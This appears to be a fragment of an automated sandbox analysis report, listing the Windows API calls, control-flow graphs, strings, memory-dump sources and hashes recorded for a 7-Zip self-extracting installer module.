                                                                                                                                                                APIs
                                                                                                                                                                • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F
                                                                                                                                                                  • Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                                                  • Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                                                  • Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                                                  • Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                                                  • Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                                                  • Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                                                  • Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
                                                                                                                                                                • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB
                                                                                                                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6
                                                                                                                                                                  • Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                                                  • Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                                                  • Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8
                                                                                                                                                                • wsprintfW.USER32 ref: 00405D45
                                                                                                                                                                • _wtol.MSVCRT ref: 00405D7F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DCE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DE2
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,0041EA30), ref: 00405DEA
                                                                                                                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
                                                                                                                                                                • _wtol.MSVCRT ref: 00405F89
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,0041EA30,0041EA30), ref: 00406118
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,0041EA30,0041EA30), ref: 0040619B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041EA30,0041EA30), ref: 00406211
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 0040622D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041EA30,0041EA30), ref: 0040626B
                                                                                                                                                                • wsprintfW.USER32 ref: 00406295
                                                                                                                                                                • _wtol.MSVCRT ref: 004064B6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00406587
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004065D4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 004065DC
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 004065FB
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406653
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 0040665B
                                                                                                                                                                • GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040673B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00406743
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040674B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00406753
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040675B
                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
                                                                                                                                                                • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040678A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00406792
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040679A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067A2
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004067BE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004067C6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067CE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067D6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,00000000,?,?), ref: 0040687F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00000000,?,?), ref: 004068A4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?), ref: 00406916
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00406937
                                                                                                                                                                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
                                                                                                                                                                • _wtol.MSVCRT ref: 00406A68
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406A8B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406AC4
                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 00406B1B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406C59
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406C67
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C92
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C9A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406CB6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406CBE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00406CEE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D2E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D97
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0041E9E8), ref: 00406D9F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E64
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E6F
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F33
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F3B
                                                                                                                                                                • _wtol.MSVCRT ref: 00406FCF
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 004071AE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,?,?,?,?), ref: 004071B6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004071DA
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407223
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040722B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407233
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407239
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407249
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407251
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040726E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407276
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040727E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407286
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040728E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041E9E8), ref: 004072AF
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041E9E8), ref: 004072B7
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004072C3
                                                                                                                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 004072E4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 004072EC
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 004072F4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 004072FA
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00407302
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 0040730A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00407312
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407331
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00407339
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407341
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407347
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004073AA
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040746E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407476
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040748D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004074A1
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004074A9
                                                                                                                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
                                                                                                                                                                • String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$A$A$A
                                                                                                                                                                • API String ID: 1301190434-1447873201
                                                                                                                                                                • Opcode ID: 314e4e2800b355338e119878eae373695adb21911a7861909f2107e886efd5ee
                                                                                                                                                                • Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
                                                                                                                                                                • Opcode Fuzzy Hash: 314e4e2800b355338e119878eae373695adb21911a7861909f2107e886efd5ee
                                                                                                                                                                • Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1174 402665-402684 LoadLibraryA GetProcAddress 1175 402692-402695 1174->1175 1176 402686-402691 GetNativeSystemInfo 1174->1176
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                                                                                                                • API String ID: 2103483237-3846845290
                                                                                                                                                                • Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                                                • Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
                                                                                                                                                                • Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                                                • Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1216 40367d-403694 GetFileAttributesW 1217 403696-403698 1216->1217 1218 40369a-40369c 1216->1218 1219 4036f3-4036f5 1217->1219 1220 4036ab-4036b2 1218->1220 1221 40369e-4036a9 SetLastError 1218->1221 1222 4036b4-4036bb call 403650 1220->1222 1223 4036bd-4036c0 1220->1223 1221->1219 1222->1219 1225 4036f0-4036f2 1223->1225 1226 4036c2-4036d3 FindFirstFileW 1223->1226 1225->1219 1226->1222 1228 4036d5-4036ee FindClose CompareFileTime 1226->1228 1228->1222 1228->1225
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
                                                                                                                                                                • SetLastError.KERNEL32(00000010), ref: 004036A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesErrorFileLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1799206407-0
                                                                                                                                                                • Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                                                • Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
                                                                                                                                                                • Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                                                • Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E
                                                                                                                                                                APIs
                                                                                                                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
                                                                                                                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 0040129F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DiskFreeMessageSendSpace
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 696007252-0
                                                                                                                                                                • Opcode ID: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                                                • Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
                                                                                                                                                                • Opcode Fuzzy Hash: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                                                • Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 793 401b0b-401b1b 794 401b27-401b52 call 413cbd 793->794 795 401b1d-401b22 793->795 800 401b54 794->800 801 401b65-401b71 call 4014eb 794->801 796 401e65-401e68 795->796 802 401b56-401b60 call 412574 800->802 807 401e47-401e62 ??3@YAXPAX@Z call 412574 801->807 808 401b77-401b7c 801->808 809 401e64 802->809 807->809 808->807 810 401b82-401bb8 call 401403 call 4017c0 call 40143c ??3@YAXPAX@Z 808->810 809->796 820 401e2d-401e30 810->820 821 401bbe-401bdd 810->821 822 401e32-401e45 ??3@YAXPAX@Z call 412574 820->822 825 401bf8-401bfc 821->825 826 401bdf-401bf3 call 412574 ??3@YAXPAX@Z 821->826 822->809 829 401c03-401c08 825->829 830 401bfe-401c01 825->830 826->802 833 401c2a-401c2d 829->833 834 401c0a 829->834 832 401c30-401c47 830->832 832->826 838 401c49-401c6c 832->838 833->832 835 401c0c-401c12 834->835 839 401c14-401c25 call 412574 ??3@YAXPAX@Z 835->839 843 401c87-401c8d 838->843 844 401c6e-401c82 call 412574 ??3@YAXPAX@Z 838->844 839->802 846 401ca9-401cbb GetLocalTime SystemTimeToFileTime 843->846 847 401c8f-401c92 843->847 844->802 850 401cc1-401cc4 846->850 848 401c94-401c96 847->848 849 401c9b-401ca7 847->849 848->835 849->850 852 401cc6-401cd0 call 4039e7 850->852 853 401cdd-401ce4 call 40367d 850->853 852->839 858 401cd6-401cd8 852->858 857 401ce9-401cee 853->857 859 401cf4-401cf7 857->859 860 401e19-401e28 GetLastError 857->860 858->835 861 401cfd-401d07 ??2@YAPAXI@Z 859->861 862 401e0f-401e12 859->862 860->820 864 401d18 861->864 865 401d09-401d16 861->865 862->860 866 401d1a-401d3e call 41334e call 412468 864->866 865->866 871 401df4-401e0d call 4136b9 call 412574 866->871 872 401d44-401d62 GetLastError call 4013d1 call 4033bd 866->872 871->822 881 401d64-401d6b 872->881 882 401d9f-401db4 call 4039e7 872->882 885 401d6f-401d7f ??3@YAXPAX@Z 881->885 886 401dc0-401dd8 call 412468 882->886 887 401db6-401dbe 882->887 888 401d81-401d83 885->888 889 401d87-401d9a call 412574 ??3@YAXPAX@Z 885->889 895 401dda-401de9 GetLastError 886->895 896 401deb-401df3 ??3@YAXPAX@Z 886->896 887->885 888->889 889->802 895->885 896->871
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                                                                                                                • Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
                                                                                                                                                                • Opcode Fuzzy Hash: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                                                                                                                • Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                                                • CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
